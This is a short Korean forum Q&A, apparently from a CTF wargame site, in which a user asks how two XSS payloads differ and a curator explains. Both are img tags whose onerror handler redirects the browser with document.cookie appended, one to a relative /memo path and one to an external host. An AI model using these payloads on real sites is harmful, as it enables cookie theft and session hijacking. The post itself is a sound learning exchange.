문제 질문
<img src="" onerror="location.href = '/memo?memo=' + document.cookie">
<img src="" onerror="location.href = 'http://host3.dreamhack.games:16080/memo?memo=' + document.cookie">
두 코드의 차이가 뭔가요?
#web
작성자 정보
답변
1
One_
큐레이터
1번코드는 지금 host를 기점으로 /memo엔드포인트에 memo인자값으로 document cookie를 넘깁니다
2번코드는 지금 host와 관계 없이 http://host3.dreamhack.games:16080/의 /memo엔드포인트에 인자값으로 document.cookie를 넘겨줍니다